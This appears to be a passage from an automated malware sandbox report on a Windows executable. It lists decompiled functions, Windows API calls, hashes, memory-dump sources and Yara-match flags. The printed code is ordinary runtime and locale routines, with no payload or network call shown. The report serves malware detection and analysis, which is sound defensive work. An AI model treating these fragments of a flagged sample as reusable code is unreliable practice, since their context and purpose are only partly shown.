                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A264, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 165edd23e112fa5d3edd759fde1a7989bead55183a8e9041540245800e4ec64e
                                            • Instruction ID: ab252603faece1db7ef5426c8ef1a02afac499e1cb68e19b4b86bace3a1bed1b
                                            • Opcode Fuzzy Hash: 165edd23e112fa5d3edd759fde1a7989bead55183a8e9041540245800e4ec64e
                                            • Instruction Fuzzy Hash: 1BE0C2B16042007BD220CF24CC95FD73B6AEF49390F058159BA4DAB382C931BA01C7A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041A2F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: c681179d652e6f1044b1542b27ff19af584072d2c8220bb4d029eee86da6291a
                                            • Instruction ID: 91d24725e4d31b49b10f57ae5312875a3247a19ef609c40b04fb3a26a24ef4ca
                                            • Opcode Fuzzy Hash: c681179d652e6f1044b1542b27ff19af584072d2c8220bb4d029eee86da6291a
                                            • Instruction Fuzzy Hash: 7BC0C0F80082401FC300FB28D8C04D7B7C5DD5031C310420BF86042303D134EB1642D2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3969c96cd3d192f38feda88bd060d61c491249bb7804d76d86b92e5f87ad092e
                                            • Instruction ID: beeab6d5116ba30470785b8a7686bf7f0e583498d7401f7d5664535370a74727
                                            • Opcode Fuzzy Hash: 3969c96cd3d192f38feda88bd060d61c491249bb7804d76d86b92e5f87ad092e
                                            • Instruction Fuzzy Hash: FCB092B2D465D5CAEB11E7A15A08B2B7A00BBE0761F26C062E2020681B47B8C4D1F6F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0030E1CF, Relevance: 124.4, APIs: 36, Strings: 35, Instructions: 193libraryloaderCOMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0030E1CF(void* __eax) {
				void* _t5;
				signed int _t74;
				struct HINSTANCE__* _t76;
				void* _t78;
				void* _t79;

				__imp__EncodePointer(0);
				_t78 = __eax;
				E00316956(__eax);
				E00314530(_t78);
				E0031645D(_t78);
				_t5 = E00316970(_t78);
				E0031691F(_t5);
				E00316B81(_t78);
				_t79 = _t78;
				_push(_t79);
				_t76 = GetModuleHandleW(L"kernel32.dll");
				 *0x333a80 = GetProcAddress(_t76, "FlsAlloc") ^  *0x32e748;
				 *0x333a84 = GetProcAddress(_t76, "FlsFree") ^  *0x32e748;
				 *0x333a88 = GetProcAddress(_t76, "FlsGetValue") ^  *0x32e748;
				 *0x333a8c = GetProcAddress(_t76, "FlsSetValue") ^  *0x32e748;
				 *0x333a90 = GetProcAddress(_t76, "InitializeCriticalSectionEx") ^  *0x32e748;
				 *0x333a94 = GetProcAddress(_t76, "CreateEventExW") ^  *0x32e748;
				 *0x333a98 = GetProcAddress(_t76, "CreateSemaphoreExW") ^  *0x32e748;
				 *0x333a9c = GetProcAddress(_t76, "SetThreadStackGuarantee") ^  *0x32e748;
				 *0x333aa0 = GetProcAddress(_t76, "CreateThreadpoolTimer") ^  *0x32e748;
				 *0x333aa4 = GetProcAddress(_t76, "SetThreadpoolTimer") ^  *0x32e748;
				 *0x333aa8 = GetProcAddress(_t76, "WaitForThreadpoolTimerCallbacks") ^  *0x32e748;
				 *0x333aac = GetProcAddress(_t76, "CloseThreadpoolTimer") ^  *0x32e748;
				 *0x333ab0 = GetProcAddress(_t76, "CreateThreadpoolWait") ^  *0x32e748;
				 *0x333ab4 = GetProcAddress(_t76, "SetThreadpoolWait") ^  *0x32e748;
				 *0x333ab8 = GetProcAddress(_t76, "CloseThreadpoolWait") ^  *0x32e748;
				 *0x333abc = GetProcAddress(_t76, "FlushProcessWriteBuffers") ^  *0x32e748;
				 *0x333ac0 = GetProcAddress(_t76, "FreeLibraryWhenCallbackReturns") ^  *0x32e748;
				 *0x333ac4 = GetProcAddress(_t76, "GetCurrentProcessorNumber") ^  *0x32e748;
				 *0x333ac8 = GetProcAddress(_t76, "GetLogicalProcessorInformation") ^  *0x32e748;
				 *0x333acc = GetProcAddress(_t76, "CreateSymbolicLinkW") ^  *0x32e748;
				 *0x333ad0 = GetProcAddress(_t76, "SetDefaultDllDirectories") ^  *0x32e748;
				 *0x333ad8 = GetProcAddress(_t76, "EnumSystemLocalesEx") ^  *0x32e748;
				 *0x333ad4 = GetProcAddress(_t76, "CompareStringEx") ^  *0x32e748;
				 *0x333adc = GetProcAddress(_t76, "GetDateFormatEx") ^  *0x32e748;
				 *0x333ae0 = GetProcAddress(_t76, "GetLocaleInfoEx") ^  *0x32e748;
				 *0x333ae4 = GetProcAddress(_t76, "GetTimeFormatEx") ^  *0x32e748;
				 *0x333ae8 = GetProcAddress(_t76, "GetUserDefaultLocaleName") ^  *0x32e748;
				 *0x333aec = GetProcAddress(_t76, "IsValidLocaleName") ^  *0x32e748;
				 *0x333af0 = GetProcAddress(_t76, "LCMapStringEx") ^  *0x32e748;
				 *0x333af4 = GetProcAddress(_t76, "GetCurrentPackageId") ^  *0x32e748;
				 *0x333af8 = GetProcAddress(_t76, "GetTickCount64") ^  *0x32e748;
				 *0x333afc = GetProcAddress(_t76, "GetFileInformationByHandleExW") ^  *0x32e748;
				_t74 = GetProcAddress(_t76, "SetFileInformationByHandleW") ^  *0x32e748;
				 *0x333b00 = _t74;
				return _t74;
			}








                                            0x0030e1d2
                                            0x0030e1d8
                                            0x0030e1db
                                            0x0030e1e1
                                            0x0030e1e7
                                            0x0030e1ed
                                            0x0030e1f3
                                            0x0030e1f9
                                            0x0030e201
                                            0x0031227b
                                            0x0031228e
                                            0x003122a4
                                            0x003122b7
                                            0x003122ca
                                            0x003122dd
                                            0x003122f0
                                            0x00312303
                                            0x00312316
                                            0x00312329
                                            0x0031233c
                                            0x0031234f
                                            0x00312362
                                            0x00312375
                                            0x00312388
                                            0x0031239b
                                            0x003123a8
                                            0x003123c1
                                            0x003123d4
                                            0x003123e7
                                            0x003123fa
                                            0x0031240d
                                            0x00312420
                                            0x00312433
                                            0x00312446
                                            0x00312459
                                            0x0031246c
                                            0x0031247f
                                            0x00312492
                                            0x003124a5
                                            0x003124b8
                                            0x003124cb
                                            0x003124d8
                                            0x003124f1
                                            0x003124f8
                                            0x003124ff
                                            0x00312505

                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00315FC2,0030E47F,0032CCA8,00000014,00000051,0032CB98,00000050,00000001), ref: 0030E1D2
                                            • __initp_misc_winsig.LIBCMT ref: 0030E1ED
                                              • Part of subcall function 0031691F: EncodePointer.KERNEL32(003168D8,0030E1F8,00000000,00000000,00000000,00000000,00000000), ref: 00316924
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000050), ref: 00312282
                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00312296
                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003122A9
                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003122BC
                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003122CF
                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003122E2
                                            • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003122F5
                                            • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00312308
                                            • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0031231B
                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0031232E
                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00312341
                                            • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00312354
                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00312367
                                            • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0031237A
                                            • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0031238D
                                            • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003123A0
                                            • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003123B3
                                            • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003123C6
                                            • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003123D9
                                            • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003123EC
                                            • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003123FF
                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00312412
                                            • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 00312425
                                            • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00312438
                                            • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 0031244B
                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0031245E
                                            • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 00312471
                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 00312484
                                            • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 00312497
                                            • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003124AA
                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003124BD
                                            • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003124D0
                                            • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 003124E3
                                            • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 003124F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$EncodePointer$HandleModule__initp_misc_winsig
                                            • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$VJc$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                            • API String ID: 1581159588-3046446558
                                            • Opcode ID: e7ad13b7076a28ef12e1e5000730d090a06124a28f32c4f218b72ae5e641fe8e
                                            • Instruction ID: 1cfe51571c5f6beb13a92fe79455b18a08173e72535dbeb0d360626bf2153cbd
                                            • Opcode Fuzzy Hash: e7ad13b7076a28ef12e1e5000730d090a06124a28f32c4f218b72ae5e641fe8e
                                            • Instruction Fuzzy Hash: E361607295026CAAA713AFB9FD87D8ABBFCFF55B01B04581EF180D2560D6B491818F90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031FABE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0031FABE(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E0031EDCD(_t28, ?str?) != 0) {
					if(E0031EDCD(_t28, ?str?) != 0) {
						return E00321BAF(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                            0x0031fac2
                                            0x0031fac7
                                            0x0031faef
                                            0x00000000
                                            0x0031fb18
                                            0x0031fb0a
                                            0x0031fb36
                                            0x00000000
                                            0x0031fb36
                                            0x00000000
                                            0x0031fb0c
                                            0x0031fb34
                                            0x00000000
                                            0x00000000
                                            0x0031fb3a
                                            0x0031fb3f
                                            0x0031fb43
                                            0x0031fb43
                                            0x0031fb11

                                            APIs
                                            • _wcscmp.LIBCMT ref: 0031FAD5
                                            • _wcscmp.LIBCMT ref: 0031FAE6
                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0031FD84,?,00000000), ref: 0031FB02
                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0031FD84,?,00000000), ref: 0031FB2C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocale_wcscmp
                                            • String ID: ACP$OCP
                                            • API String ID: 1351282208-711371036
                                            • Opcode ID: 446c65068064017ad59334c7129a039bc03a991db3e02458fa3a9060b38b3926
                                            • Instruction ID: 020bd2d57c257ae6b484a55aac5846f65789e6e0572c361b7a75759df71c7e5b
                                            • Opcode Fuzzy Hash: 446c65068064017ad59334c7129a039bc03a991db3e02458fa3a9060b38b3926
                                            • Instruction Fuzzy Hash: 9A018031308115AFDB2BAE18FC95ED937AC9F08760F15C029F905DA051E770DAC187D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407AD7, Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: C$a$b$d$i
                                            • API String ID: 0-2334916691
                                            • Opcode ID: 5beeeb1f4de26e6cf8b315900b2bcc65b5408b39c7a03ac5dc1792941e1cc07a
                                            • Instruction ID: 139621a4c997d04aeceefbdcc2dc9f9edf91a00567c11e64de365abecd89704c
                                            • Opcode Fuzzy Hash: 5beeeb1f4de26e6cf8b315900b2bcc65b5408b39c7a03ac5dc1792941e1cc07a
                                            • Instruction Fuzzy Hash: 1641B3B2E05208ABEB10DFA1DC45BEFB778EF45704F00851EF514A7242E77869418BE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407A9C, Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: C$a$b$d$i
                                            • API String ID: 0-2334916691
                                            • Opcode ID: 64e84917d1bde03018025b0fda0069404367e1e9966a9a7b47882c9be868e6fe
                                            • Instruction ID: 5ed0d5e02fd6cab1859e22e4dcb6c7be423fbdbaff6e219c4efe37fd02d09196
                                            • Opcode Fuzzy Hash: 64e84917d1bde03018025b0fda0069404367e1e9966a9a7b47882c9be868e6fe
                                            • Instruction Fuzzy Hash: 3441A3B1E04308AAEB10DFA5DC45BEFB778EF49304F00451EF515A7242E77965418BEA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00416CA6, Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f8d307e884edbc023141ccba9e5c9b8e38f927e9136d86c82d81a2cd1cf0874
                                            • Instruction ID: 1b97aaa71cb5c969423e1395228c650b258096288af1739222e12c744d212a4c
                                            • Opcode Fuzzy Hash: 7f8d307e884edbc023141ccba9e5c9b8e38f927e9136d86c82d81a2cd1cf0874
                                            • Instruction Fuzzy Hash: AAB01223F460040248280C8938050B4E335C2C3075D52339BCD4C735103442C42101DD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F198A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14579877d0528605ecc83a6e2f5525cd5e9113f611bf7ddfebaaf7afe6360266
                                            • Instruction ID: 3feeda0c9dfc47fae5eebfdb93349a1788511384cc32c7a5d00dd45ba32401cc
                                            • Opcode Fuzzy Hash: 14579877d0528605ecc83a6e2f5525cd5e9113f611bf7ddfebaaf7afe6360266
                                            • Instruction Fuzzy Hash: 8E90026134101402D202615954146061009D7D1395FA1C022E5415555E86658953F172
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F1B040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ceaebf1fd27615a358082ffb9a703565f559ee9981f1e76393f5b0da4343e0a
                                            • Instruction ID: 234d5b3ce5c297fb803711e8cce97fb07447c900457d3339b04627ec72f0c461
                                            • Opcode Fuzzy Hash: 6ceaebf1fd27615a358082ffb9a703565f559ee9981f1e76393f5b0da4343e0a
                                            • Instruction Fuzzy Hash: 1F9002A1641150434640B15958044066015A7E13513A1C131A4445560D86A88855F2A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd8db451ab1af58f2ec6311cae0bc24d7a1087a10f9431243959350703b2e838
                                            • Instruction ID: 004fe49cf579ce3ce12c7529f5000aa93c5d6fb5c011c72aac090b273a53db8f
                                            • Opcode Fuzzy Hash: fd8db451ab1af58f2ec6311cae0bc24d7a1087a10f9431243959350703b2e838
                                            • Instruction Fuzzy Hash: 3790027128101402D241715954046061009A7D0391FA1C022A4415554F86958A56FAA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F195F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5675a802582231cfc3bfd6480b841d9746c5ee7602082c3efda03e3f0798232b
                                            • Instruction ID: ecfb0b16f3837384e65b81baa23b5db7b2f28c534e4683c153e4deb33532fc1b
                                            • Opcode Fuzzy Hash: 5675a802582231cfc3bfd6480b841d9746c5ee7602082c3efda03e3f0798232b
                                            • Instruction Fuzzy Hash: D290027124101802D20461595804686100597D0351F61C021AA015655F96A58891B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F199D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab9d88a683c9a1c698686e00fb4b80cae6999b6c2176d2d9318aaf4bfcca37f6
                                            • Instruction ID: 5729d63b4a33aae77485448b528747f76aecf620e1b9a20b43cf4051b16b8e3e
                                            • Opcode Fuzzy Hash: ab9d88a683c9a1c698686e00fb4b80cae6999b6c2176d2d9318aaf4bfcca37f6
                                            • Instruction Fuzzy Hash: 329002A125101042D20461595404706104597E1351F61C022A6145554DC5698C61B165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 080ffb8d96a9b996e5169e3f6373c6199227d3e07b19a04ff2c30fdd952e5c53
                                            • Instruction ID: 82dab58bf26553aaa6fa12ea2e9ed209779dc7613288f2430bab03ad9500c1c3
                                            • Opcode Fuzzy Hash: 080ffb8d96a9b996e5169e3f6373c6199227d3e07b19a04ff2c30fdd952e5c53
                                            • Instruction Fuzzy Hash: F0900265261010020245A559160450B1445A7D63A13A1C025F5407590DC6618865B361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 489bcbfa5405f111690e3a80d4286f48f670a1a586c2327bb7ae901f1f71342a
                                            • Instruction ID: 57ed4ac78ed06b0df41dc673726b780269647733e171bac125467e0407e5d190
                                            • Opcode Fuzzy Hash: 489bcbfa5405f111690e3a80d4286f48f670a1a586c2327bb7ae901f1f71342a
                                            • Instruction Fuzzy Hash: AF9002A124141403D24065595804607100597D0352F61C021A6055555F8A698C51B175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F1AD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bced39e7736271009adb40eee976e691206af1faa6ca83d69a5eca1cc2f69289
                                            • Instruction ID: 63182f3a59c449b353093b84470d4fee22ea7db839bf35106365621c33c9409c
                                            • Opcode Fuzzy Hash: bced39e7736271009adb40eee976e691206af1faa6ca83d69a5eca1cc2f69289
                                            • Instruction Fuzzy Hash: 65900271A45010129240715958146465006A7E0791B65C021A4505554D89948A55B3E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a05ca9edf54cde6da824bc83f8c02b19648ea7ab9800af4ecac1bc4f4a04ac7
                                            • Instruction ID: e787538c836176b2dd8eeaebfef61d227d33a777d0decf85d721f295c3494464
                                            • Opcode Fuzzy Hash: 1a05ca9edf54cde6da824bc83f8c02b19648ea7ab9800af4ecac1bc4f4a04ac7
                                            • Instruction Fuzzy Hash: 5A9002E1241150924600A2599404B0A550597E0351B61C026E5045560DC5658851F175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F196D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c86e1503e20b74a67bf5f2d8d4d84c36486e29e7096677e28368cd16f266ac80
                                            • Instruction ID: da75aa5f62a14e831f600dbd8c49684cbede51a4b6caf527e41d5f5e5a49350e
                                            • Opcode Fuzzy Hash: c86e1503e20b74a67bf5f2d8d4d84c36486e29e7096677e28368cd16f266ac80
                                            • Instruction Fuzzy Hash: 2790027124101842D20061595404B46100597E0351F61C026A4115654E8655C851B561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b43c6d0e1ff6f09a6c7cd54aefc4a2b3c8ac0375d56d95de21c826c4fbf3338f
                                            • Instruction ID: 358fa67c51aef212d719b98f97019c12bcd8f253b69f3ffb00d325b996d20164
                                            • Opcode Fuzzy Hash: b43c6d0e1ff6f09a6c7cd54aefc4a2b3c8ac0375d56d95de21c826c4fbf3338f
                                            • Instruction Fuzzy Hash: 3490026124145442D24062595804B0F510597E1352FA1C029A8147554DC9558855B761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19650, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63f717338933f643ef327d24facac6b5303166679364a433b1864c2f4c7cf557
                                            • Instruction ID: 360d70cb6d9e667cfaffb425f26690ad0659d103913a4d367afbdc9d7df6cc81
                                            • Opcode Fuzzy Hash: 63f717338933f643ef327d24facac6b5303166679364a433b1864c2f4c7cf557
                                            • Instruction Fuzzy Hash: 4B90027124505842D24071595404A46101597D0355F61C021A4055694E96658D55F6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a14a2bfc45b96b878ced78a1cdca2d27676fe0d9dced48de0fb57ca63f9e5ac0
                                            • Instruction ID: df05826ea40230d41a10d7341889b51d230c439f939703590957860d5d95e289
                                            • Opcode Fuzzy Hash: a14a2bfc45b96b878ced78a1cdca2d27676fe0d9dced48de0fb57ca63f9e5ac0
                                            • Instruction Fuzzy Hash: 1590027124141402D20061595808747100597D0352F61C021A9155555F86A5C891B571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00F19610, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, Offset: 00EB0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c122818f573f2b0d70c49ae13c1568f09eca4a935d92ea5055e735279801e2a
                                            • Instruction ID: bdaa2dad59c895c4aa6e22f108f81dc157e27d9ba471883b0ea75ba5881eb174
                                            • Opcode Fuzzy Hash: 9c122818f573f2b0d70c49ae13c1568f09eca4a935d92ea5055e735279801e2a
                                            • Instruction Fuzzy Hash: B290027164501802D25071595414746100597D0351F61C021A4015654E87958A55B6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

